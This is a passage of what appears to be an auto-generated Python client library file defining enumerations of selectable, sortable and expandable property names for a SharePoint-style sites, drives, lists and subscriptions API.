LIFECYCLE_NOTIFICATION_URL = "lifecycleNotificationUrl"
NOTIFICATION_URL = "notificationUrl"
RESOURCE = "resource"
class Enum123(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
APPLICATION_ID = "applicationId"
CHANGE_TYPE = "changeType"
CLIENT_STATE = "clientState"
CREATOR_ID = "creatorId"
ENCRYPTION_CERTIFICATE = "encryptionCertificate"
ENCRYPTION_CERTIFICATE_ID = "encryptionCertificateId"
EXPIRATION_DATE_TIME = "expirationDateTime"
INCLUDE_RESOURCE_DATA = "includeResourceData"
LATEST_SUPPORTED_TLS_VERSION = "latestSupportedTlsVersion"
LIFECYCLE_NOTIFICATION_URL = "lifecycleNotificationUrl"
NOTIFICATION_URL = "notificationUrl"
RESOURCE = "resource"
class Enum127(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
CREATED_BY = "createdBy"
CREATED_BY_DESC = "createdBy desc"
CREATED_DATE_TIME = "createdDateTime"
CREATED_DATE_TIME_DESC = "createdDateTime desc"
DESCRIPTION = "description"
DESCRIPTION_DESC = "description desc"
E_TAG = "eTag"
E_TAG_DESC = "eTag desc"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_BY_DESC = "lastModifiedBy desc"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
LAST_MODIFIED_DATE_TIME_DESC = "lastModifiedDateTime desc"
NAME = "name"
NAME_DESC = "name desc"
PARENT_REFERENCE = "parentReference"
PARENT_REFERENCE_DESC = "parentReference desc"
WEB_URL = "webUrl"
WEB_URL_DESC = "webUrl desc"
DISPLAY_NAME = "displayName"
DISPLAY_NAME_DESC = "displayName desc"
ERROR = "error"
ERROR_DESC = "error desc"
ROOT = "root"
ROOT_DESC = "root desc"
SHAREPOINT_IDS = "sharepointIds"
SHAREPOINT_IDS_DESC = "sharepointIds desc"
SITE_COLLECTION = "siteCollection"
SITE_COLLECTION_DESC = "siteCollection desc"
class Enum128(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
DISPLAY_NAME = "displayName"
ERROR = "error"
ROOT = "root"
SHAREPOINT_IDS = "sharepointIds"
SITE_COLLECTION = "siteCollection"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Enum129(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Enum130(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
DISPLAY_NAME = "displayName"
ERROR = "error"
ROOT = "root"
SHAREPOINT_IDS = "sharepointIds"
SITE_COLLECTION = "siteCollection"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Enum131(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Enum132(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
CREATED_BY = "createdBy"
CREATED_BY_DESC = "createdBy desc"
CREATED_DATE_TIME = "createdDateTime"
CREATED_DATE_TIME_DESC = "createdDateTime desc"
DESCRIPTION = "description"
DESCRIPTION_DESC = "description desc"
E_TAG = "eTag"
E_TAG_DESC = "eTag desc"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_BY_DESC = "lastModifiedBy desc"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
LAST_MODIFIED_DATE_TIME_DESC = "lastModifiedDateTime desc"
NAME = "name"
NAME_DESC = "name desc"
PARENT_REFERENCE = "parentReference"
PARENT_REFERENCE_DESC = "parentReference desc"
WEB_URL = "webUrl"
WEB_URL_DESC = "webUrl desc"
DISPLAY_NAME = "displayName"
DISPLAY_NAME_DESC = "displayName desc"
ERROR = "error"
ERROR_DESC = "error desc"
ROOT = "root"
ROOT_DESC = "root desc"
SHAREPOINT_IDS = "sharepointIds"
SHAREPOINT_IDS_DESC = "sharepointIds desc"
SITE_COLLECTION = "siteCollection"
SITE_COLLECTION_DESC = "siteCollection desc"
class Enum133(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
DISPLAY_NAME = "displayName"
ERROR = "error"
ROOT = "root"
SHAREPOINT_IDS = "sharepointIds"
SITE_COLLECTION = "siteCollection"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Enum134(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Enum135(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
CREATED_BY = "createdBy"
CREATED_BY_DESC = "createdBy desc"
CREATED_DATE_TIME = "createdDateTime"
CREATED_DATE_TIME_DESC = "createdDateTime desc"
DESCRIPTION = "description"
DESCRIPTION_DESC = "description desc"
E_TAG = "eTag"
E_TAG_DESC = "eTag desc"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_BY_DESC = "lastModifiedBy desc"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
LAST_MODIFIED_DATE_TIME_DESC = "lastModifiedDateTime desc"
NAME = "name"
NAME_DESC = "name desc"
PARENT_REFERENCE = "parentReference"
PARENT_REFERENCE_DESC = "parentReference desc"
WEB_URL = "webUrl"
WEB_URL_DESC = "webUrl desc"
DISPLAY_NAME = "displayName"
DISPLAY_NAME_DESC = "displayName desc"
ERROR = "error"
ERROR_DESC = "error desc"
ROOT = "root"
ROOT_DESC = "root desc"
SHAREPOINT_IDS = "sharepointIds"
SHAREPOINT_IDS_DESC = "sharepointIds desc"
SITE_COLLECTION = "siteCollection"
SITE_COLLECTION_DESC = "siteCollection desc"
class Enum65(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
CREATED_BY = "createdBy"
CREATED_DATE_TIME = "createdDateTime"
DESCRIPTION = "description"
E_TAG = "eTag"
LAST_MODIFIED_BY = "lastModifiedBy"
LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
NAME = "name"
PARENT_REFERENCE = "parentReference"
WEB_URL = "webUrl"
DISPLAY_NAME = "displayName"
ERROR = "error"
ROOT = "root"
SHAREPOINT_IDS = "sharepointIds"
SITE_COLLECTION = "siteCollection"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Enum66(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Enum68(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
CREATED_BY_USER = "createdByUser"
LAST_MODIFIED_BY_USER = "lastModifiedByUser"
ANALYTICS = "analytics"
COLUMNS = "columns"
CONTENT_TYPES = "contentTypes"
DRIVE = "drive"
DRIVES = "drives"
ITEMS = "items"
LISTS = "lists"
SITES = "sites"
ONENOTE = "onenote"
class Enum69(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ALL_TIME = "allTime"
ITEM_ACTIVITY_STATS = "itemActivityStats"
LAST_SEVEN_DAYS = "lastSevenDays"
class Enum70(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ASTERISK = "*"
ALL_TIME = "allTime"
ITEM_ACTIVITY_STATS = "itemActivityStats"
LAST_SEVEN_DAYS = "lastSevenDays"
class Enum71(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
ID_DESC = "id desc"
BOOLEAN = "boolean"
BOOLEAN_DESC = "boolean desc"
CALCULATED = "calculated"
CALCULATED_DESC = "calculated desc"
CHOICE = "choice"
CHOICE_DESC = "choice desc"
COLUMN_GROUP = "columnGroup"
COLUMN_GROUP_DESC = "columnGroup desc"
CURRENCY = "currency"
CURRENCY_DESC = "currency desc"
DATE_TIME = "dateTime"
DATE_TIME_DESC = "dateTime desc"
DEFAULT_VALUE = "defaultValue"
DEFAULT_VALUE_DESC = "defaultValue desc"
DESCRIPTION = "description"
DESCRIPTION_DESC = "description desc"
DISPLAY_NAME = "displayName"
DISPLAY_NAME_DESC = "displayName desc"
ENFORCE_UNIQUE_VALUES = "enforceUniqueValues"
ENFORCE_UNIQUE_VALUES_DESC = "enforceUniqueValues desc"
GEOLOCATION = "geolocation"
GEOLOCATION_DESC = "geolocation desc"
HIDDEN = "hidden"
HIDDEN_DESC = "hidden desc"
INDEXED = "indexed"
INDEXED_DESC = "indexed desc"
LOOKUP = "lookup"
LOOKUP_DESC = "lookup desc"
NAME = "name"
NAME_DESC = "name desc"
NUMBER = "number"
NUMBER_DESC = "number desc"
PERSON_OR_GROUP = "personOrGroup"
PERSON_OR_GROUP_DESC = "personOrGroup desc"
READ_ONLY = "readOnly"
READ_ONLY_DESC = "readOnly desc"
REQUIRED = "required"
REQUIRED_DESC = "required desc"
TEXT = "text"
TEXT_DESC = "text desc"
class Enum72(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
BOOLEAN = "boolean"
CALCULATED = "calculated"
CHOICE = "choice"
COLUMN_GROUP = "columnGroup"
CURRENCY = "currency"
DATE_TIME = "dateTime"
DEFAULT_VALUE = "defaultValue"
DESCRIPTION = "description"
DISPLAY_NAME = "displayName"
ENFORCE_UNIQUE_VALUES = "enforceUniqueValues"
GEOLOCATION = "geolocation"
HIDDEN = "hidden"
INDEXED = "indexed"
LOOKUP = "lookup"
NAME = "name"
NUMBER = "number"
PERSON_OR_GROUP = "personOrGroup"
READ_ONLY = "readOnly"
REQUIRED = "required"
TEXT = "text"
class Enum73(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
ID = "id"
BOOLEAN = "boolean"
CALCULATED = "calculated"
CHOICE = "choice"
COLUMN_GROUP = "columnGroup"
CURRENCY = "currency"
DATE_TIME = "dateTime"
DEFAULT_VALUE = "defaultValue"
DESCRIPTION = "description"
DISPLAY_NAME = "displayName"
ENFORCE_UNIQUE_VALUES = "enforceUniqueValues"
GEOLOCATION = "geolocation"
HIDDEN = "hidden"
INDEXED = "indexed"
LOOKUP = "lookup"
NAME = "name"
NUMBER = "number"
PERSON_OR_GROUP = "personOrGroup"
READ_ONLY = "readOnly"
REQUIRED = "required"
TEXT = "text"
class Enum74(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Orderable property names and their ' desc' variants (auto-generated; presumably OData $orderby values — confirm against the API spec)."""
    ID = "id"
    ID_DESC = "id desc"
    DESCRIPTION = "description"
    DESCRIPTION_DESC = "description desc"
    GROUP = "group"
    GROUP_DESC = "group desc"
    HIDDEN = "hidden"
    HIDDEN_DESC = "hidden desc"
    INHERITED_FROM = "inheritedFrom"
    INHERITED_FROM_DESC = "inheritedFrom desc"
    NAME = "name"
    NAME_DESC = "name desc"
    ORDER = "order"
    ORDER_DESC = "order desc"
    PARENT_ID = "parentId"
    PARENT_ID_DESC = "parentId desc"
    READ_ONLY = "readOnly"
    READ_ONLY_DESC = "readOnly desc"
    SEALED = "sealed"
    SEALED_DESC = "sealed desc"
class Enum75(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Selectable property names (auto-generated; presumably OData $select values — confirm against the API spec)."""
    ID = "id"
    DESCRIPTION = "description"
    GROUP = "group"
    HIDDEN = "hidden"
    INHERITED_FROM = "inheritedFrom"
    NAME = "name"
    ORDER = "order"
    PARENT_ID = "parentId"
    READ_ONLY = "readOnly"
    SEALED = "sealed"
    COLUMN_LINKS = "columnLinks"
class Enum76(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """'*' or navigation-property names (auto-generated; presumably OData $expand values — confirm against the API spec)."""
    ASTERISK = "*"
    COLUMN_LINKS = "columnLinks"
class Enum77(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Selectable property names (auto-generated; presumably OData $select values — confirm against the API spec)."""
    ID = "id"
    DESCRIPTION = "description"
    GROUP = "group"
    HIDDEN = "hidden"
    INHERITED_FROM = "inheritedFrom"
    NAME = "name"
    ORDER = "order"
    PARENT_ID = "parentId"
    READ_ONLY = "readOnly"
    SEALED = "sealed"
    COLUMN_LINKS = "columnLinks"
class Enum78(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """'*' or navigation-property names (auto-generated; presumably OData $expand values — confirm against the API spec)."""
    ASTERISK = "*"
    COLUMN_LINKS = "columnLinks"
class Enum79(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Orderable property names and their ' desc' variants (auto-generated; presumably OData $orderby values — confirm against the API spec)."""
    ID = "id"
    ID_DESC = "id desc"
    NAME = "name"
    NAME_DESC = "name desc"
class Enum80(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Selectable property names (auto-generated; presumably OData $select values — confirm against the API spec)."""
    ID = "id"
    NAME = "name"
class Enum81(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Selectable property names (auto-generated; presumably OData $select values — confirm against the API spec)."""
    ID = "id"
    NAME = "name"
class Enum82(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Selectable property names (auto-generated; presumably OData $select values — confirm against the API spec)."""
    ID = "id"
    CREATED_BY = "createdBy"
    CREATED_DATE_TIME = "createdDateTime"
    DESCRIPTION = "description"
    E_TAG = "eTag"
    LAST_MODIFIED_BY = "lastModifiedBy"
    LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
    NAME = "name"
    PARENT_REFERENCE = "parentReference"
    WEB_URL = "webUrl"
    DRIVE_TYPE = "driveType"
    OWNER = "owner"
    QUOTA = "quota"
    SHARE_POINT_IDS = "sharePointIds"
    SYSTEM = "system"
    CREATED_BY_USER = "createdByUser"
    LAST_MODIFIED_BY_USER = "lastModifiedByUser"
    FOLLOWING = "following"
    ITEMS = "items"
    LIST = "list"
    ROOT = "root"
    SPECIAL = "special"
class Enum83(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """'*' or navigation-property names (auto-generated; presumably OData $expand values — confirm against the API spec)."""
    ASTERISK = "*"
    CREATED_BY_USER = "createdByUser"
    LAST_MODIFIED_BY_USER = "lastModifiedByUser"
    FOLLOWING = "following"
    ITEMS = "items"
    LIST = "list"
    ROOT = "root"
    SPECIAL = "special"
class Enum84(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Orderable property names and their ' desc' variants (auto-generated; presumably OData $orderby values — confirm against the API spec)."""
    ID = "id"
    ID_DESC = "id desc"
    CREATED_BY = "createdBy"
    CREATED_BY_DESC = "createdBy desc"
    CREATED_DATE_TIME = "createdDateTime"
    CREATED_DATE_TIME_DESC = "createdDateTime desc"
    DESCRIPTION = "description"
    DESCRIPTION_DESC = "description desc"
    E_TAG = "eTag"
    E_TAG_DESC = "eTag desc"
    LAST_MODIFIED_BY = "lastModifiedBy"
    LAST_MODIFIED_BY_DESC = "lastModifiedBy desc"
    LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
    LAST_MODIFIED_DATE_TIME_DESC = "lastModifiedDateTime desc"
    NAME = "name"
    NAME_DESC = "name desc"
    PARENT_REFERENCE = "parentReference"
    PARENT_REFERENCE_DESC = "parentReference desc"
    WEB_URL = "webUrl"
    WEB_URL_DESC = "webUrl desc"
    DRIVE_TYPE = "driveType"
    DRIVE_TYPE_DESC = "driveType desc"
    OWNER = "owner"
    OWNER_DESC = "owner desc"
    QUOTA = "quota"
    QUOTA_DESC = "quota desc"
    SHARE_POINT_IDS = "sharePointIds"
    SHARE_POINT_IDS_DESC = "sharePointIds desc"
    SYSTEM = "system"
    SYSTEM_DESC = "system desc"
class Enum85(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Selectable property names (auto-generated; presumably OData $select values — confirm against the API spec)."""
    ID = "id"
    CREATED_BY = "createdBy"
    CREATED_DATE_TIME = "createdDateTime"
    DESCRIPTION = "description"
    E_TAG = "eTag"
    LAST_MODIFIED_BY = "lastModifiedBy"
    LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
    NAME = "name"
    PARENT_REFERENCE = "parentReference"
    WEB_URL = "webUrl"
    DRIVE_TYPE = "driveType"
    OWNER = "owner"
    QUOTA = "quota"
    SHARE_POINT_IDS = "sharePointIds"
    SYSTEM = "system"
    CREATED_BY_USER = "createdByUser"
    LAST_MODIFIED_BY_USER = "lastModifiedByUser"
    FOLLOWING = "following"
    ITEMS = "items"
    LIST = "list"
    ROOT = "root"
    SPECIAL = "special"
class Enum86(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """'*' or navigation-property names (auto-generated; presumably OData $expand values — confirm against the API spec)."""
    ASTERISK = "*"
    CREATED_BY_USER = "createdByUser"
    LAST_MODIFIED_BY_USER = "lastModifiedByUser"
    FOLLOWING = "following"
    ITEMS = "items"
    LIST = "list"
    ROOT = "root"
    SPECIAL = "special"
class Enum87(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Selectable property names (auto-generated; presumably OData $select values — confirm against the API spec)."""
    ID = "id"
    CREATED_BY = "createdBy"
    CREATED_DATE_TIME = "createdDateTime"
    DESCRIPTION = "description"
    E_TAG = "eTag"
    LAST_MODIFIED_BY = "lastModifiedBy"
    LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
    NAME = "name"
    PARENT_REFERENCE = "parentReference"
    WEB_URL = "webUrl"
    DRIVE_TYPE = "driveType"
    OWNER = "owner"
    QUOTA = "quota"
    SHARE_POINT_IDS = "sharePointIds"
    SYSTEM = "system"
    CREATED_BY_USER = "createdByUser"
    LAST_MODIFIED_BY_USER = "lastModifiedByUser"
    FOLLOWING = "following"
    ITEMS = "items"
    LIST = "list"
    ROOT = "root"
    SPECIAL = "special"
class Enum88(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """'*' or navigation-property names (auto-generated; presumably OData $expand values — confirm against the API spec)."""
    ASTERISK = "*"
    CREATED_BY_USER = "createdByUser"
    LAST_MODIFIED_BY_USER = "lastModifiedByUser"
    FOLLOWING = "following"
    ITEMS = "items"
    LIST = "list"
    ROOT = "root"
    SPECIAL = "special"
class Enum89(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Orderable property names and their ' desc' variants (auto-generated; presumably OData $orderby values — confirm against the API spec)."""
    ID = "id"
    ID_DESC = "id desc"
    CREATED_BY = "createdBy"
    CREATED_BY_DESC = "createdBy desc"
    CREATED_DATE_TIME = "createdDateTime"
    CREATED_DATE_TIME_DESC = "createdDateTime desc"
    DESCRIPTION = "description"
    DESCRIPTION_DESC = "description desc"
    E_TAG = "eTag"
    E_TAG_DESC = "eTag desc"
    LAST_MODIFIED_BY = "lastModifiedBy"
    LAST_MODIFIED_BY_DESC = "lastModifiedBy desc"
    LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
    LAST_MODIFIED_DATE_TIME_DESC = "lastModifiedDateTime desc"
    NAME = "name"
    NAME_DESC = "name desc"
    PARENT_REFERENCE = "parentReference"
    PARENT_REFERENCE_DESC = "parentReference desc"
    WEB_URL = "webUrl"
    WEB_URL_DESC = "webUrl desc"
    DISPLAY_NAME = "displayName"
    DISPLAY_NAME_DESC = "displayName desc"
    LIST = "list"
    LIST_DESC = "list desc"
    SHAREPOINT_IDS = "sharepointIds"
    SHAREPOINT_IDS_DESC = "sharepointIds desc"
    SYSTEM = "system"
    SYSTEM_DESC = "system desc"
class Enum90(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Selectable property names (auto-generated; presumably OData $select values — confirm against the API spec)."""
    ID = "id"
    CREATED_BY = "createdBy"
    CREATED_DATE_TIME = "createdDateTime"
    DESCRIPTION = "description"
    E_TAG = "eTag"
    LAST_MODIFIED_BY = "lastModifiedBy"
    LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
    NAME = "name"
    PARENT_REFERENCE = "parentReference"
    WEB_URL = "webUrl"
    DISPLAY_NAME = "displayName"
    LIST = "list"
    SHAREPOINT_IDS = "sharepointIds"
    SYSTEM = "system"
    CREATED_BY_USER = "createdByUser"
    LAST_MODIFIED_BY_USER = "lastModifiedByUser"
    COLUMNS = "columns"
    CONTENT_TYPES = "contentTypes"
    DRIVE = "drive"
    ITEMS = "items"
    SUBSCRIPTIONS = "subscriptions"
class Enum91(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """'*' or navigation-property names (auto-generated; presumably OData $expand values — confirm against the API spec)."""
    ASTERISK = "*"
    CREATED_BY_USER = "createdByUser"
    LAST_MODIFIED_BY_USER = "lastModifiedByUser"
    COLUMNS = "columns"
    CONTENT_TYPES = "contentTypes"
    DRIVE = "drive"
    ITEMS = "items"
    SUBSCRIPTIONS = "subscriptions"
class Enum92(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Selectable property names (auto-generated; presumably OData $select values — confirm against the API spec)."""
    ID = "id"
    CREATED_BY = "createdBy"
    CREATED_DATE_TIME = "createdDateTime"
    DESCRIPTION = "description"
    E_TAG = "eTag"
    LAST_MODIFIED_BY = "lastModifiedBy"
    LAST_MODIFIED_DATE_TIME = "lastModifiedDateTime"
    NAME = "name"
    PARENT_REFERENCE = "parentReference"
    WEB_URL = "webUrl"
    DISPLAY_NAME = "displayName"
    LIST = "list"
    SHAREPOINT_IDS = "sharepointIds"
    SYSTEM = "system"
    CREATED_BY_USER = "createdByUser"
    LAST_MODIFIED_BY_USER = "lastModifiedByUser"
    COLUMNS = "columns"
    CONTENT_TYPES = "contentTypes"
    DRIVE = "drive"
    ITEMS = "items"
    SUBSCRIPTIONS = "subscriptions"
class Enum93(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """'*' or navigation-property names (auto-generated; presumably OData $expand values — confirm against the API spec)."""
    ASTERISK = "*"
    CREATED_BY_USER = "createdByUser"
    LAST_MODIFIED_BY_USER = "lastModifiedByUser"
    COLUMNS = "columns"
    CONTENT_TYPES = "contentTypes"
    DRIVE = "drive"
    ITEMS = "items"
    SUBSCRIPTIONS = "subscriptions"
class Enum94(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Orderable property names and their ' desc' variants (auto-generated; presumably OData $orderby values — confirm against the API spec)."""
    ID = "id"
    ID_DESC = "id desc"
    BOOLEAN = "boolean"
    BOOLEAN_DESC = "boolean desc"
    CALCULATED = "calculated"
    CALCULATED_DESC = "calculated desc"
    CHOICE = "choice"
    CHOICE_DESC = "choice desc"
    COLUMN_GROUP = "columnGroup"
    COLUMN_GROUP_DESC = "columnGroup desc"
    CURRENCY = "currency"
    CURRENCY_DESC = "currency desc"
    DATE_TIME = "dateTime"
    DATE_TIME_DESC = "dateTime desc"
    DEFAULT_VALUE = "defaultValue"
    DEFAULT_VALUE_DESC = "defaultValue desc"
    DESCRIPTION = "description"
    DESCRIPTION_DESC = "description desc"
    DISPLAY_NAME = "displayName"
    DISPLAY_NAME_DESC = "displayName desc"
    ENFORCE_UNIQUE_VALUES = "enforceUniqueValues"
    ENFORCE_UNIQUE_VALUES_DESC = "enforceUniqueValues desc"
    GEOLOCATION = "geolocation"
    GEOLOCATION_DESC = "geolocation desc"
    HIDDEN = "hidden"
    HIDDEN_DESC = "hidden desc"
    INDEXED = "indexed"
    INDEXED_DESC = "indexed desc"
    LOOKUP = "lookup"
    LOOKUP_DESC = "lookup desc"
    NAME = "name"
    NAME_DESC = "name desc"
    NUMBER = "number"
    NUMBER_DESC = "number desc"
    PERSON_OR_GROUP = "personOrGroup"
    PERSON_OR_GROUP_DESC = "personOrGroup desc"
    READ_ONLY = "readOnly"
    READ_ONLY_DESC = "readOnly desc"
    REQUIRED = "required"
    REQUIRED_DESC = "required desc"
    TEXT = "text"
    TEXT_DESC = "text desc"
class Enum95(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Selectable property names (auto-generated; presumably OData $select values — confirm against the API spec)."""
    ID = "id"
    BOOLEAN = "boolean"
    CALCULATED = "calculated"
    CHOICE = "choice"
    COLUMN_GROUP = "columnGroup"
    CURRENCY = "currency"
    DATE_TIME = "dateTime"
    DEFAULT_VALUE = "defaultValue"
    DESCRIPTION = "description"
    DISPLAY_NAME = "displayName"
    ENFORCE_UNIQUE_VALUES = "enforceUniqueValues"
    GEOLOCATION = "geolocation"
    HIDDEN = "hidden"
    INDEXED = "indexed"
    LOOKUP = "lookup"
    NAME = "name"
    NUMBER = "number"
    PERSON_OR_GROUP = "personOrGroup"
    READ_ONLY = "readOnly"
    REQUIRED = "required"
    TEXT = "text"
class Enum96(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Selectable property names (auto-generated; presumably OData $select values — confirm against the API spec)."""
    ID = "id"
    BOOLEAN = "boolean"
    CALCULATED = "calculated"
    CHOICE = "choice"
    COLUMN_GROUP = "columnGroup"
    CURRENCY = "currency"
    DATE_TIME = "dateTime"
    DEFAULT_VALUE = "defaultValue"
    DESCRIPTION = "description"
    DISPLAY_NAME = "displayName"
    ENFORCE_UNIQUE_VALUES = "enforceUniqueValues"
    GEOLOCATION = "geolocation"
    HIDDEN = "hidden"
    INDEXED = "indexed"
    LOOKUP = "lookup"
    NAME = "name"
    NUMBER = "number"
    PERSON_OR_GROUP = "personOrGroup"
    READ_ONLY = "readOnly"
    REQUIRED = "required"
    TEXT = "text"
class Enum97(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Orderable property names and their ' desc' variants (auto-generated; presumably OData $orderby values — confirm against the API spec)."""
    ID = "id"
    ID_DESC = "id desc"
    DESCRIPTION = "description"
    DESCRIPTION_DESC = "description desc"
    GROUP = "group"
    GROUP_DESC = "group desc"
    HIDDEN = "hidden"
    HIDDEN_DESC = "hidden desc"
    INHERITED_FROM = "inheritedFrom"
    INHERITED_FROM_DESC = "inheritedFrom desc"
    NAME = "name"
    NAME_DESC = "name desc"
    ORDER = "order"
    ORDER_DESC = "order desc"
    PARENT_ID = "parentId"
    PARENT_ID_DESC = "parentId desc"
    READ_ONLY = "readOnly"
    READ_ONLY_DESC = "readOnly desc"
    SEALED = "sealed"
    SEALED_DESC = "sealed desc"
class Enum98(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """Selectable property names (auto-generated; presumably OData $select values — confirm against the API spec)."""
    ID = "id"
    DESCRIPTION = "description"
    GROUP = "group"
    HIDDEN = "hidden"
    INHERITED_FROM = "inheritedFrom"
    NAME = "name"
    ORDER = "order"
    PARENT_ID = "parentId"
    READ_ONLY = "readOnly"
    SEALED = "sealed"
    COLUMN_LINKS = "columnLinks"
class Enum99(with_metaclass(_CaseInsensitiveEnumMeta, str, Enum)):
    """'*' or navigation-property names (auto-generated; presumably OData $expand values — confirm against the API spec)."""
    ASTERISK = "*"
    COLUMN_LINKS = "columnLinks"
